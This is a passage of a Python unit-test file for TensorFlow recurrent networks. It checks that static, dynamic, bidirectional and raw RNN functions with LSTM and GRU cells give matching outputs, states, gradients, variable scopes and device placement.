def _testScope(self, factory, prefix="prefix", use_outer_scope=True):
with self.test_session(use_gpu=True, graph=tf.Graph()):
if use_outer_scope:
with tf.variable_scope(prefix) as scope:
factory(scope)
else:
factory(prefix)
tf.global_variables_initializer()
# check that all the variables names starts
# with the proper scope.
all_vars = tf.global_variables()
prefix = prefix or "rnn"
scope_vars = [v for v in all_vars if v.name.startswith(prefix + "/")]
tf.logging.info("RNN with scope: %s (%s)"
% (prefix, "scope" if use_outer_scope else "str"))
for v in scope_vars:
tf.logging.info(v.name)
self.assertEqual(len(scope_vars), len(all_vars))
def testDynamicScope(self):
time_steps = 8
num_units = 3
input_size = 5
batch_size = 2
sequence_length = np.random.randint(0, time_steps, size=batch_size)
def factory(scope):
concat_inputs = tf.placeholder(
tf.float32, shape=(time_steps, batch_size, input_size))
cell = tf.contrib.rnn.GRUCell(num_units=num_units)
return tf.nn.dynamic_rnn(cell, inputs=concat_inputs,
sequence_length=sequence_length,
time_major=True, dtype=tf.float32,
scope=scope)
self._testScope(factory, use_outer_scope=True)
self._testScope(factory, use_outer_scope=False)
self._testScope(factory, prefix=None, use_outer_scope=False)
class LSTMTest(tf.test.TestCase):
def setUp(self):
self._seed = 23489
np.random.seed(self._seed)
def testDynamicRNNAllowsUnknownTimeDimension(self):
inputs = tf.placeholder(tf.float32, shape=[1, None, 20])
cell = tf.contrib.rnn.GRUCell(30)
# Smoke test, this should not raise an error
tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32)
def testDynamicRNNWithTupleStates(self):
num_units = 3
input_size = 5
batch_size = 2
num_proj = 4
max_length = 8
sequence_length = [4, 6]
with self.test_session(graph=tf.Graph()) as sess:
initializer = tf.random_uniform_initializer(-0.01, 0.01, seed=self._seed)
inputs = max_length * [
tf.placeholder(tf.float32, shape=(None, input_size))]
inputs_c = tf.stack(inputs)
cell = tf.contrib.rnn.LSTMCell(
num_units, use_peepholes=True,
num_proj=num_proj, initializer=initializer, state_is_tuple=True)
with tf.variable_scope("root") as scope:
outputs_static, state_static = tf.contrib.rnn.static_rnn(
cell, inputs, dtype=tf.float32,
sequence_length=sequence_length, scope=scope)
scope.reuse_variables()
outputs_dynamic, state_dynamic = tf.nn.dynamic_rnn(
cell, inputs_c, dtype=tf.float32, time_major=True,
sequence_length=sequence_length, scope=scope)
self.assertTrue(isinstance(state_static, tf.contrib.rnn.LSTMStateTuple))
self.assertTrue(isinstance(state_dynamic, tf.contrib.rnn.LSTMStateTuple))
self.assertEqual(state_static[0], state_static.c)
self.assertEqual(state_static[1], state_static.h)
self.assertEqual(state_dynamic[0], state_dynamic.c)
self.assertEqual(state_dynamic[1], state_dynamic.h)
tf.global_variables_initializer().run()
input_value = np.random.randn(batch_size, input_size)
outputs_static_v = sess.run(
outputs_static, feed_dict={inputs[0]: input_value})
outputs_dynamic_v = sess.run(
outputs_dynamic, feed_dict={inputs[0]: input_value})
self.assertAllEqual(outputs_static_v, outputs_dynamic_v)
state_static_v = sess.run(
state_static, feed_dict={inputs[0]: input_value})
state_dynamic_v = sess.run(
state_dynamic, feed_dict={inputs[0]: input_value})
self.assertAllEqual(
np.hstack(state_static_v), np.hstack(state_dynamic_v))
def testDynamicRNNWithNestedTupleStates(self):
num_units = 3
input_size = 5
batch_size = 2
num_proj = 4
max_length = 8
sequence_length = [4, 6]
with self.test_session(graph=tf.Graph()) as sess:
initializer = tf.random_uniform_initializer(-0.01, 0.01, seed=self._seed)
inputs = max_length * [
tf.placeholder(tf.float32, shape=(None, input_size))]
inputs_c = tf.stack(inputs)
def _cell(i):
return tf.contrib.rnn.LSTMCell(
num_units + i, use_peepholes=True,
num_proj=num_proj + i, initializer=initializer, state_is_tuple=True)
# This creates a state tuple which has 4 sub-tuples of length 2 each.
cell = tf.contrib.rnn.MultiRNNCell(
[_cell(i) for i in range(4)], state_is_tuple=True)
self.assertEqual(len(cell.state_size), 4)
for i in range(4):
self.assertEqual(len(cell.state_size[i]), 2)
test_zero = cell.zero_state(1, tf.float32)
self.assertEqual(len(test_zero), 4)
for i in range(4):
self.assertEqual(test_zero[i][0].get_shape()[1], cell.state_size[i][0])
self.assertEqual(test_zero[i][1].get_shape()[1], cell.state_size[i][1])
with tf.variable_scope("root") as scope:
outputs_static, state_static = tf.contrib.rnn.static_rnn(
cell, inputs, dtype=tf.float32,
sequence_length=sequence_length, scope=scope)
scope.reuse_variables()
outputs_dynamic, state_dynamic = tf.nn.dynamic_rnn(
cell, inputs_c, dtype=tf.float32, time_major=True,
sequence_length=sequence_length, scope=scope)
tf.global_variables_initializer().run()
input_value = np.random.randn(batch_size, input_size)
outputs_static_v = sess.run(
outputs_static, feed_dict={inputs[0]: input_value})
outputs_dynamic_v = sess.run(
outputs_dynamic, feed_dict={inputs[0]: input_value})
self.assertAllEqual(outputs_static_v, outputs_dynamic_v)
state_static_v = sess.run(
nest.flatten(state_static), feed_dict={inputs[0]: input_value})
state_dynamic_v = sess.run(
nest.flatten(state_dynamic), feed_dict={inputs[0]: input_value})
self.assertAllEqual(
np.hstack(state_static_v), np.hstack(state_dynamic_v))
def _testDynamicEquivalentToStaticRNN(self, use_gpu, use_sequence_length):
time_steps = 8
num_units = 3
num_proj = 4
input_size = 5
batch_size = 2
input_values = np.random.randn(time_steps, batch_size, input_size)
if use_sequence_length:
sequence_length = np.random.randint(0, time_steps, size=batch_size)
else:
sequence_length = None
########### Step 1: Run static graph and generate readouts
with self.test_session(use_gpu=use_gpu, graph=tf.Graph()) as sess:
concat_inputs = tf.placeholder(tf.float32,
shape=(time_steps, batch_size, input_size))
inputs = tf.unstack(concat_inputs)
initializer = tf.random_uniform_initializer(-0.01, 0.01, seed=self._seed)
cell = tf.contrib.rnn.LSTMCell(
num_units, use_peepholes=True,
initializer=initializer, num_proj=num_proj, state_is_tuple=False)
with tf.variable_scope("dynamic_scope"):
outputs_static, state_static = tf.contrib.rnn.static_rnn(
cell, inputs, sequence_length=sequence_length, dtype=tf.float32)
feeds = {concat_inputs: input_values}
# Initialize
tf.global_variables_initializer().run(feed_dict=feeds)
# Generate gradients of sum of outputs w.r.t. inputs
static_gradients = tf.gradients(
outputs_static + [state_static], [concat_inputs])
# Generate gradients of individual outputs w.r.t. inputs
static_individual_gradients = nest.flatten([
tf.gradients(y, [concat_inputs])
for y in [outputs_static[0],
outputs_static[-1],
state_static]])
# Generate gradients of individual variables w.r.t. inputs
trainable_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)
assert len(trainable_variables) > 1, (
"Count of trainable variables: %d" % len(trainable_variables))
# pylint: disable=bad-builtin
static_individual_variable_gradients = nest.flatten([
tf.gradients(y, trainable_variables)
for y in [outputs_static[0],
outputs_static[-1],
state_static]])
# Test forward pass
values_static = sess.run(outputs_static, feed_dict=feeds)
(state_value_static,) = sess.run((state_static,), feed_dict=feeds)
# Test gradients to inputs and variables w.r.t. outputs & final state
static_grad_values = sess.run(static_gradients, feed_dict=feeds)
static_individual_grad_values = sess.run(
static_individual_gradients, feed_dict=feeds)
static_individual_var_grad_values = sess.run(
static_individual_variable_gradients, feed_dict=feeds)
########## Step 2: Run dynamic graph and generate readouts
with self.test_session(use_gpu=use_gpu, graph=tf.Graph()) as sess:
concat_inputs = tf.placeholder(tf.float32,
shape=(time_steps, batch_size, input_size))
inputs = tf.unstack(concat_inputs)
initializer = tf.random_uniform_initializer(-0.01, 0.01, seed=self._seed)
cell = tf.contrib.rnn.LSTMCell(
num_units, use_peepholes=True,
initializer=initializer, num_proj=num_proj, state_is_tuple=False)
with tf.variable_scope("dynamic_scope"):
outputs_dynamic, state_dynamic = tf.nn.dynamic_rnn(
cell, inputs=concat_inputs, sequence_length=sequence_length,
time_major=True, dtype=tf.float32)
split_outputs_dynamic = tf.unstack(outputs_dynamic, time_steps)
feeds = {concat_inputs: input_values}
# Initialize
tf.global_variables_initializer().run(feed_dict=feeds)
# Generate gradients of sum of outputs w.r.t. inputs
dynamic_gradients = tf.gradients(
split_outputs_dynamic + [state_dynamic], [concat_inputs])
# Generate gradients of several individual outputs w.r.t. inputs
dynamic_individual_gradients = nest.flatten([
tf.gradients(y, [concat_inputs])
for y in [split_outputs_dynamic[0],
split_outputs_dynamic[-1],
state_dynamic]])
# Generate gradients of individual variables w.r.t. inputs
trainable_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)
assert len(trainable_variables) > 1, (
"Count of trainable variables: %d" % len(trainable_variables))
dynamic_individual_variable_gradients = nest.flatten([
tf.gradients(y, trainable_variables)
for y in [split_outputs_dynamic[0],
split_outputs_dynamic[-1],
state_dynamic]])
# Test forward pass
values_dynamic = sess.run(split_outputs_dynamic, feed_dict=feeds)
(state_value_dynamic,) = sess.run(
(state_dynamic,), feed_dict=feeds)
# Test gradients to inputs and variables w.r.t. outputs & final state
dynamic_grad_values = sess.run(dynamic_gradients, feed_dict=feeds)
dynamic_individual_grad_values = sess.run(
dynamic_individual_gradients, feed_dict=feeds)
dynamic_individual_var_grad_values = sess.run(
dynamic_individual_variable_gradients, feed_dict=feeds)
######### Step 3: Comparisons
self.assertEqual(len(values_static), len(values_dynamic))
for (value_static, value_dynamic) in zip(values_static, values_dynamic):
self.assertAllEqual(value_static, value_dynamic)
self.assertAllEqual(state_value_static, state_value_dynamic)
self.assertAllEqual(static_grad_values, dynamic_grad_values)
self.assertEqual(len(static_individual_grad_values),
len(dynamic_individual_grad_values))
self.assertEqual(len(static_individual_var_grad_values),
len(dynamic_individual_var_grad_values))
for i, (a, b) in enumerate(zip(static_individual_grad_values,
dynamic_individual_grad_values)):
tf.logging.info("Comparing individual gradients iteration %d" % i)
self.assertAllEqual(a, b)
for i, (a, b) in enumerate(zip(static_individual_var_grad_values,
dynamic_individual_var_grad_values)):
tf.logging.info(
"Comparing individual variable gradients iteration %d" % i)
self.assertAllEqual(a, b)
def testDynamicEquivalentToStaticRNN(self):
self._testDynamicEquivalentToStaticRNN(
use_gpu=False, use_sequence_length=False)
self._testDynamicEquivalentToStaticRNN(
use_gpu=True, use_sequence_length=False)
self._testDynamicEquivalentToStaticRNN(
use_gpu=False, use_sequence_length=True)
self._testDynamicEquivalentToStaticRNN(
use_gpu=True, use_sequence_length=True)
class BidirectionalRNNTest(tf.test.TestCase):
def setUp(self):
self._seed = 23489
np.random.seed(self._seed)
def _createBidirectionalDynamicRNN(self, use_gpu, use_shape,
use_state_tuple, use_time_major,
scope=None):
num_units = 3
input_size = 5
batch_size = 2
max_length = 8
initializer = tf.random_uniform_initializer(-0.01, 0.01, seed=self._seed)
sequence_length = tf.placeholder(tf.int64)
cell_fw = tf.contrib.rnn.LSTMCell(num_units,
initializer=initializer,
state_is_tuple=use_state_tuple)
cell_bw = tf.contrib.rnn.LSTMCell(num_units,
initializer=initializer,
state_is_tuple=use_state_tuple)
inputs = max_length * [
tf.placeholder(tf.float32,
shape=(batch_size if use_shape else None, input_size))]
inputs_c = tf.stack(inputs)
if not use_time_major:
inputs_c = tf.transpose(inputs_c, [1, 0, 2])
outputs, states = tf.nn.bidirectional_dynamic_rnn(
cell_fw,
cell_bw,
inputs_c,
sequence_length,
dtype=tf.float32,
time_major=use_time_major,
scope=scope)
outputs = tf.concat_v2(outputs, 2)
state_fw, state_bw = states
outputs_shape = [None, max_length, 2 * num_units]
if use_shape:
outputs_shape[0] = batch_size
if use_time_major:
outputs_shape[0], outputs_shape[1] = outputs_shape[1], outputs_shape[0]
self.assertEqual(
outputs.get_shape().as_list(),
outputs_shape)
input_value = np.random.randn(batch_size, input_size)
return input_value, inputs, outputs, state_fw, state_bw, sequence_length
def _testBidirectionalDynamicRNN(self, use_gpu, use_shape,
use_state_tuple, use_time_major):
with self.test_session(use_gpu=use_gpu, graph=tf.Graph()) as sess:
input_value, inputs, outputs, state_fw, state_bw, sequence_length = (
self._createBidirectionalDynamicRNN(
use_gpu, use_shape, use_state_tuple, use_time_major))
tf.global_variables_initializer().run()
# Run with pre-specified sequence length of 2, 3
if use_state_tuple:
out, c_fw, m_fw, c_bw, m_bw = sess.run(
[outputs, state_fw[0], state_fw[1], state_bw[0], state_bw[1]],
feed_dict={inputs[0]: input_value,
sequence_length: [2, 3]})
s_fw = (c_fw, m_fw)
s_bw = (c_bw, m_bw)
else:
out, s_fw, s_bw = sess.run([outputs, state_fw, state_bw],
feed_dict={inputs[0]: input_value,
sequence_length: [2, 3]})
# Since the forward and backward LSTM cells were initialized with the
# same parameters, the forward and backward output has to be the same,
# but reversed in time. The format is output[time][batch][depth], and
# due to depth concatenation (as num_units=3 for both RNNs):
# - forward output: out[][][depth] for 0 <= depth < 3
# - backward output: out[][][depth] for 4 <= depth < 6
#
# First sequence in batch is length=2
# Check that the time=0 forward output is equal to time=1 backward output
if not use_time_major:
out = np.swapaxes(out, 0, 1)
self.assertEqual(out[0][0][0], out[1][0][3])
self.assertEqual(out[0][0][1], out[1][0][4])
self.assertEqual(out[0][0][2], out[1][0][5])
# Check that the time=1 forward output is equal to time=0 backward output
self.assertEqual(out[1][0][0], out[0][0][3])
self.assertEqual(out[1][0][1], out[0][0][4])
self.assertEqual(out[1][0][2], out[0][0][5])
# Second sequence in batch is length=3
# Check that the time=0 forward output is equal to time=2 backward output
self.assertEqual(out[0][1][0], out[2][1][3])
self.assertEqual(out[0][1][1], out[2][1][4])
self.assertEqual(out[0][1][2], out[2][1][5])
# Check that the time=1 forward output is equal to time=1 backward output
self.assertEqual(out[1][1][0], out[1][1][3])
self.assertEqual(out[1][1][1], out[1][1][4])
self.assertEqual(out[1][1][2], out[1][1][5])
# Check that the time=2 forward output is equal to time=0 backward output
self.assertEqual(out[2][1][0], out[0][1][3])
self.assertEqual(out[2][1][1], out[0][1][4])
self.assertEqual(out[2][1][2], out[0][1][5])
# Via the reasoning above, the forward and backward final state should be
# exactly the same
self.assertAllClose(s_fw, s_bw)
def testBidirectionalDynamicRNN(self):
# Generate 2^4 option values
# from [True, True, True, True] to [False, False, False, False]
options = itertools.product([True, False], repeat=4)
for option in options:
self._testBidirectionalDynamicRNN(use_gpu=option[0], use_shape=option[1],
use_state_tuple=option[2],
use_time_major=option[3])
def _testScope(self, factory, prefix="prefix", use_outer_scope=True):
# REMARKS: factory(scope) is a function accepting a scope
# as an argument, such scope can be None, a string
# or a VariableScope instance.
with self.test_session(use_gpu=True, graph=tf.Graph()):
if use_outer_scope:
with tf.variable_scope(prefix) as scope:
factory(scope)
else:
factory(prefix)
# check that all the variables names starts
# with the proper scope.
tf.global_variables_initializer()
all_vars = tf.global_variables()
prefix = prefix or "bidirectional_rnn"
scope_vars = [v for v in all_vars if v.name.startswith(prefix + "/")]
tf.logging.info("BiRNN with scope: %s (%s)"
% (prefix, "scope" if use_outer_scope else "str"))
for v in scope_vars:
tf.logging.info(v.name)
self.assertEqual(len(scope_vars), len(all_vars))
def testBidirectionalDynamicRNNScope(self):
def get_factory(use_time_major):
def factory(scope):
return self._createBidirectionalDynamicRNN(
use_gpu=True, use_shape=True, use_state_tuple=True,
use_time_major=use_time_major, scope=scope)
return factory
self._testScope(get_factory(True), use_outer_scope=True)
self._testScope(get_factory(True), use_outer_scope=False)
self._testScope(get_factory(True), prefix=None, use_outer_scope=False)
self._testScope(get_factory(False), use_outer_scope=True)
self._testScope(get_factory(False), use_outer_scope=False)
self._testScope(get_factory(False), prefix=None, use_outer_scope=False)
class MultiDimensionalLSTMTest(tf.test.TestCase):
def setUp(self):
self._seed = 23489
np.random.seed(self._seed)
def testMultiDimensionalLSTMAllRNNContainers(self):
feature_dims = (3, 4, 5)
input_size = feature_dims
batch_size = 2
max_length = 8
sequence_length = [4, 6]
with self.test_session(graph=tf.Graph()) as sess:
inputs = max_length * [
tf.placeholder(tf.float32, shape=(None,) + input_size)]
inputs_using_dim = max_length * [
tf.placeholder(tf.float32, shape=(batch_size,) + input_size)]
inputs_c = tf.stack(inputs)
# Create a cell for the whole test. This is fine because the cell has no
# variables.
cell = DummyMultiDimensionalLSTM(feature_dims)
state_saver = TestStateSaver(batch_size, input_size)
outputs_static, state_static = tf.contrib.rnn.static_rnn(
cell, inputs, dtype=tf.float32,
sequence_length=sequence_length)
outputs_dynamic, state_dynamic = tf.nn.dynamic_rnn(
cell, inputs_c, dtype=tf.float32, time_major=True,
sequence_length=sequence_length)
self.assertEqual(outputs_dynamic.get_shape().as_list(),
inputs_c.get_shape().as_list())
tf.global_variables_initializer().run()
input_total_size = (batch_size,) + input_size
input_value = np.random.randn(*input_total_size)
outputs_static_v = sess.run(
outputs_static, feed_dict={inputs[0]: input_value})
outputs_dynamic_v = sess.run(
outputs_dynamic, feed_dict={inputs[0]: input_value})
self.assertAllEqual(outputs_static_v, outputs_dynamic_v)
state_static_v = sess.run(
state_static, feed_dict={inputs[0]: input_value})
state_dynamic_v = sess.run(
state_dynamic, feed_dict={inputs[0]: input_value})
self.assertAllEqual(
np.hstack(state_static_v), np.hstack(state_dynamic_v))
class NestedLSTMTest(tf.test.TestCase):
def setUp(self):
self._seed = 23489
np.random.seed(self._seed)
def testNestedIOLSTMAllRNNContainers(self):
input_size = 5
batch_size = 2
state_size = 6
max_length = 8
sequence_length = [4, 6]
with self.test_session(graph=tf.Graph()) as sess:
state_saver = TestStateSaver(batch_size, state_size)
single_input = (tf.placeholder(tf.float32, shape=(None, input_size)),
tf.placeholder(tf.float32, shape=(None, input_size)))
inputs = max_length * [single_input]
inputs_c = (tf.stack([input_[0] for input_ in inputs]),
tf.stack([input_[1] for input_ in inputs]))
single_input_using_dim = (
tf.placeholder(tf.float32, shape=(batch_size, input_size)),
tf.placeholder(tf.float32, shape=(batch_size, input_size)))
inputs_using_dim = max_length * [single_input_using_dim]
# Create a cell for the whole test. This is fine because the cell has no
# variables.
cell = NestedRNNCell()
outputs_dynamic, state_dynamic = tf.nn.dynamic_rnn(
cell, inputs_c, dtype=tf.float32, time_major=True,
sequence_length=sequence_length)
outputs_static, state_static = tf.contrib.rnn.static_rnn(
cell, inputs, dtype=tf.float32,
sequence_length=sequence_length)
def _assert_same_shape(input1, input2, double=False):
flat_input1 = nest.flatten(input1)
flat_input2 = nest.flatten(input2)
for inp1, inp2 in zip(flat_input1, flat_input2):
input_shape = inp1.get_shape().as_list()
if double:
input_shape[1] *= 2
self.assertEqual(input_shape, inp2.get_shape().as_list())
_assert_same_shape(inputs_c, outputs_dynamic)
_assert_same_shape(inputs, outputs_static)
tf.global_variables_initializer().run()
input_total_size = (batch_size, input_size)
input_value = (np.random.randn(*input_total_size),
np.random.randn(*input_total_size))
outputs_dynamic_v = sess.run(
outputs_dynamic, feed_dict={single_input: input_value})
outputs_static_v = sess.run(
outputs_static, feed_dict={single_input: input_value})
self.assertAllEqual(outputs_static_v,
np.transpose(outputs_dynamic_v, (1, 0, 2, 3)))
state_dynamic_v = sess.run(
state_dynamic, feed_dict={single_input: input_value})
state_static_v = sess.run(
state_static, feed_dict={single_input: input_value})
self.assertAllEqual(
np.hstack(state_static_v), np.hstack(state_dynamic_v))
class RawRNNTest(tf.test.TestCase):
def setUp(self):
self._seed = 23489
np.random.seed(self._seed)
def _testRawRNN(self, max_time):
with self.test_session(graph=tf.Graph()) as sess:
batch_size = 16
input_depth = 4
num_units = 3
inputs = tf.placeholder(shape=(max_time, batch_size, input_depth),
dtype=tf.float32)
sequence_length = tf.placeholder(shape=(batch_size,), dtype=tf.int32)
inputs_ta = tf.TensorArray(dtype=tf.float32, size=tf.shape(inputs)[0])
inputs_ta = inputs_ta.unpack(inputs)
cell = tf.contrib.rnn.LSTMCell(num_units, state_is_tuple=True)
def loop_fn(time_, cell_output, cell_state, unused_loop_state):
emit_output = cell_output # == None for time == 0
if cell_output is None: # time == 0
next_state = cell.zero_state(batch_size, tf.float32)
else:
next_state = cell_state # copy state through
elements_finished = (time_ >= sequence_length)
finished = tf.reduce_all(elements_finished)
# For the very final iteration, we must emit a dummy input
next_input = tf.cond(
finished,
lambda: tf.zeros([batch_size, input_depth], dtype=tf.float32),
lambda: inputs_ta.read(time_))
return (elements_finished, next_input, next_state, emit_output, None)
reuse_scope = tf.get_variable_scope()
outputs_ta, final_state, _ = tf.nn.raw_rnn(
cell, loop_fn, scope=reuse_scope)
outputs = outputs_ta.pack()
reuse_scope.reuse_variables()
outputs_dynamic_rnn, final_state_dynamic_rnn = tf.nn.dynamic_rnn(
cell, inputs, time_major=True, dtype=tf.float32,
sequence_length=sequence_length, scope=reuse_scope)
variables = tf.trainable_variables()
gradients = tf.gradients([outputs, final_state], [inputs] + variables)
gradients_dynamic_rnn = tf.gradients(
[outputs_dynamic_rnn, final_state_dynamic_rnn], [inputs] + variables)
tf.global_variables_initializer().run()
rand_input = np.random.randn(max_time, batch_size, input_depth)
if max_time == 0:
rand_seq_len = np.zeros(batch_size)
else:
rand_seq_len = np.random.randint(max_time, size=batch_size)
# To ensure same output lengths for dynamic_rnn and raw_rnn
rand_seq_len[0] = max_time
(outputs_val, outputs_dynamic_rnn_val,
final_state_val, final_state_dynamic_rnn_val) = sess.run(
[outputs, outputs_dynamic_rnn, final_state, final_state_dynamic_rnn],
feed_dict={inputs: rand_input, sequence_length: rand_seq_len})
self.assertAllClose(outputs_dynamic_rnn_val, outputs_val)
self.assertAllClose(final_state_dynamic_rnn_val, final_state_val)
# NOTE: Because with 0 time steps, raw_rnn does not have shape
# information about the input, it is impossible to perform
# gradients comparisons as the gradients eval will fail. So
# this case skips the gradients test.
if max_time > 0:
self.assertEqual(len(gradients), len(gradients_dynamic_rnn))
gradients_val = sess.run(
gradients,
feed_dict={inputs: rand_input, sequence_length: rand_seq_len})
gradients_dynamic_rnn_val = sess.run(
gradients_dynamic_rnn,
feed_dict={inputs: rand_input, sequence_length: rand_seq_len})
self.assertEqual(len(gradients_val), len(gradients_dynamic_rnn_val))
input_gradients_val = gradients_val[0]
input_gradients_dynamic_rnn_val = gradients_dynamic_rnn_val[0]
self.assertAllClose(
input_gradients_val, input_gradients_dynamic_rnn_val)
for i in range(1, len(gradients_val)):
self.assertAllClose(gradients_dynamic_rnn_val[i], gradients_val[i])
def testRawRNNZeroLength(self):
# NOTE: Because with 0 time steps, raw_rnn does not have shape
# information about the input, it is impossible to perform
# gradients comparisons as the gradients eval will fail. So this
# case skips the gradients test.
self._testRawRNN(max_time=0)
def testRawRNN(self):
self._testRawRNN(max_time=10)
def testLoopState(self):
with self.test_session(graph=tf.Graph()):
max_time = 10
batch_size = 16
input_depth = 4
num_units = 3
inputs = np.random.randn(max_time, batch_size, input_depth)
inputs_ta = tf.TensorArray(dtype=tf.float32, size=tf.shape(inputs)[0])
inputs_ta = inputs_ta.unpack(inputs)
cell = tf.contrib.rnn.LSTMCell(num_units, state_is_tuple=True)
def loop_fn(time_, cell_output, cell_state, loop_state):
if cell_output is None:
loop_state = tf.constant([0])
next_state = cell.zero_state(batch_size, tf.float32)
else:
loop_state = tf.stack([tf.squeeze(loop_state) + 1])
next_state = cell_state
emit_output = cell_output # == None for time == 0
elements_finished = tf.tile([time_ >= max_time], [batch_size])
finished = tf.reduce_all(elements_finished)
# For the very final iteration, we must emit a dummy input
next_input = tf.cond(
finished,
lambda: tf.zeros([batch_size, input_depth], dtype=tf.float32),
lambda: inputs_ta.read(time_))
return (elements_finished, next_input,
next_state, emit_output, loop_state)
r = tf.nn.raw_rnn(cell, loop_fn)
loop_state = r[-1]
self.assertEqual([10], loop_state.eval())
def testLoopStateWithTensorArray(self):
with self.test_session(graph=tf.Graph()):
max_time = 4
batch_size = 16
input_depth = 4
num_units = 3
inputs = np.random.randn(max_time, batch_size, input_depth)
inputs_ta = tf.TensorArray(dtype=tf.float32, size=tf.shape(inputs)[0])
inputs_ta = inputs_ta.unpack(inputs)
cell = tf.contrib.rnn.LSTMCell(num_units, state_is_tuple=True)
def loop_fn(time_, cell_output, cell_state, loop_state):
if cell_output is None:
loop_state = tf.TensorArray(
dynamic_size=True, size=0, dtype=tf.int32, clear_after_read=False)
loop_state = loop_state.write(0, 1)
next_state = cell.zero_state(batch_size, tf.float32)
else:
loop_state = loop_state.write(
time_, loop_state.read(time_ - 1) + time_)
next_state = cell_state
emit_output = cell_output # == None for time == 0
elements_finished = tf.tile([time_ >= max_time], [batch_size])
finished = tf.reduce_all(elements_finished)
# For the very final iteration, we must emit a dummy input
next_input = tf.cond(
finished,
lambda: tf.zeros([batch_size, input_depth], dtype=tf.float32),
lambda: inputs_ta.read(time_))
return (elements_finished, next_input,
next_state, emit_output, loop_state)
r = tf.nn.raw_rnn(cell, loop_fn)
loop_state = r[-1]
loop_state = loop_state.pack()
self.assertAllEqual([1, 2, 2 + 2, 4 + 3, 7 + 4], loop_state.eval())
def testEmitDifferentStructureThanCellOutput(self):
with self.test_session(graph=tf.Graph()) as sess:
max_time = 10
batch_size = 16
input_depth = 4
num_units = 3
inputs = np.random.randn(max_time, batch_size, input_depth)
inputs_ta = tf.TensorArray(dtype=tf.float32, size=tf.shape(inputs)[0])
inputs_ta = inputs_ta.unpack(inputs)
cell = tf.contrib.rnn.LSTMCell(num_units, state_is_tuple=True)
def loop_fn(time_, cell_output, cell_state, _):
if cell_output is None:
emit_output = (tf.zeros([2, 3], dtype=tf.int32),
tf.zeros([1], dtype=tf.int64))
next_state = cell.zero_state(batch_size, tf.float32)
else:
emit_output = (tf.ones([batch_size, 2, 3], dtype=tf.int32),
tf.ones([batch_size, 1], dtype=tf.int64))
next_state = cell_state
elements_finished = tf.tile([time_ >= max_time], [batch_size])
finished = tf.reduce_all(elements_finished)
# For the very final iteration, we must emit a dummy input
next_input = tf.cond(
finished,
lambda: tf.zeros([batch_size, input_depth], dtype=tf.float32),
lambda: inputs_ta.read(time_))
return (elements_finished, next_input, next_state, emit_output, None)
r = tf.nn.raw_rnn(cell, loop_fn)
output_ta = r[0]
self.assertEqual(2, len(output_ta))
self.assertEqual([tf.int32, tf.int64], [ta.dtype for ta in output_ta])
output = [ta.pack() for ta in output_ta]
output_vals = sess.run(output)
self.assertAllEqual(
np.ones((max_time, batch_size, 2, 3), np.int32), output_vals[0])
self.assertAllEqual(
np.ones((max_time, batch_size, 1), np.int64), output_vals[1])
def _testScope(self, factory, prefix="prefix", use_outer_scope=True):
with self.test_session(use_gpu=True, graph=tf.Graph()):
if use_outer_scope:
with tf.variable_scope(prefix) as scope:
factory(scope)
else:
factory(prefix)
tf.global_variables_initializer()
# check that all the variables names starts
# with the proper scope.
all_vars = tf.global_variables()
prefix = prefix or "rnn"
scope_vars = [v for v in all_vars if v.name.startswith(prefix + "/")]
tf.logging.info("RNN with scope: %s (%s)"
% (prefix, "scope" if use_outer_scope else "str"))
for v in scope_vars:
tf.logging.info(v.name)
self.assertEqual(len(scope_vars), len(all_vars))
def testRawRNNScope(self):
max_time = 10
batch_size = 16
input_depth = 4
num_units = 3
def factory(scope):
inputs = tf.placeholder(shape=(max_time, batch_size, input_depth),
dtype=tf.float32)
sequence_length = tf.placeholder(shape=(batch_size,), dtype=tf.int32)
inputs_ta = tf.TensorArray(dtype=tf.float32, size=tf.shape(inputs)[0])
inputs_ta = inputs_ta.unpack(inputs)
cell = tf.contrib.rnn.LSTMCell(num_units, state_is_tuple=True)
def loop_fn(time_, cell_output, cell_state, unused_loop_state):
emit_output = cell_output # == None for time == 0
if cell_output is None: # time == 0
next_state = cell.zero_state(batch_size, tf.float32)
else:
next_state = cell_state
elements_finished = (time_ >= sequence_length)
finished = tf.reduce_all(elements_finished)
# For the very final iteration, we must emit a dummy input
next_input = tf.cond(
finished,
lambda: tf.zeros([batch_size, input_depth], dtype=tf.float32),
lambda: inputs_ta.read(time_))
return (elements_finished, next_input, next_state, emit_output, None)
return tf.nn.raw_rnn(cell, loop_fn, scope=scope)
self._testScope(factory, use_outer_scope=True)
self._testScope(factory, use_outer_scope=False)
self._testScope(factory, prefix=None, use_outer_scope=False)
class DeviceWrapperCell(tf.contrib.rnn.RNNCell):
"""Class to ensure cell calculation happens on a specific device."""
def __init__(self, cell, device):
self._cell = cell
self._device = device
@property
def output_size(self):
return self._cell.output_size
@property
def state_size(self):
return self._cell.state_size
def __call__(self, input_, state, scope=None):
if self._device is not None:
with tf.device(self._device):
return self._cell(input_, state, scope)
else:
return self._cell(input_, state, scope)
class TensorArrayOnCorrectDeviceTest(tf.test.TestCase):
def _execute_rnn_on(
self, rnn_device=None, cell_device=None, input_device=None):
batch_size = 3
time_steps = 7
input_size = 5
num_units = 10
cell = tf.contrib.rnn.LSTMCell(num_units, use_peepholes=True)
gpu_cell = DeviceWrapperCell(cell, cell_device)
inputs = np.random.randn(batch_size, time_steps, input_size).astype(
np.float32)
sequence_length = np.random.randint(0, time_steps, size=batch_size)
if input_device is not None:
with tf.device(input_device):
inputs = tf.constant(inputs)
if rnn_device is not None:
with tf.device(rnn_device):
outputs, _ = tf.nn.dynamic_rnn(
gpu_cell, inputs, sequence_length=sequence_length, dtype=tf.float32)
else:
outputs, _ = tf.nn.dynamic_rnn(
gpu_cell, inputs, sequence_length=sequence_length, dtype=tf.float32)
with self.test_session(use_gpu=True) as sess:
opts = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)
run_metadata = tf.RunMetadata()
tf.global_variables_initializer().run()
sess.run(outputs, options=opts, run_metadata=run_metadata)
return run_metadata
def testRNNOnCPUCellOnGPU(self):
if not tf.test.is_gpu_available():
return # Test requires access to a GPU
run_metadata = self._execute_rnn_on(
rnn_device="/cpu:0", cell_device="/gpu:0")
step_stats = run_metadata.step_stats
ix = 0 if "gpu" in step_stats.dev_stats[0].device else 1
gpu_stats = step_stats.dev_stats[ix].node_stats
cpu_stats = step_stats.dev_stats[1 - ix].node_stats
def _assert_in(op_str, in_stats, out_stats):
self.assertTrue(any(op_str in s.node_name for s in in_stats))
self.assertFalse(any(op_str in s.node_name for s in out_stats))
